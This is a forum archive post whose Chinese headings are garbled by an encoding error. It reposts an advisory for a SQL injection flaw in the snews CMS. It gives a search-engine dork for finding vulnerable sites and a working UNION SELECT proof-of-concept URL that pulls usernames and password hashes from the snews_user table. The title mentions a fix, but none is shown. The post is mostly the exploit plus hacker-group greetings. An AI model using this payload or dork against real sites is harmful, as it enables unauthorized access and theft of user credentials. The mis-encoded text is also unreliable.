CMS snews SQL×¢Éä¼°ÐÞ¸´

admin ·¢±íÓÚ 2013-1-23 08:55:06

±êÌâ: CMS snews SQL Injection Vulnerability
×÷Õß: By onestree
ÏÂÔØµØÖ· : http://snewscms.com/
²âÊÔÆ½Ì¨ : ubuntu 12.10 / win 7
¹Ø¼ü´Ê: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=

Ê¾Àý

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

ÖÂÐ»:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

CMS snews SQL×¢Éä¼°ÐÞ¸´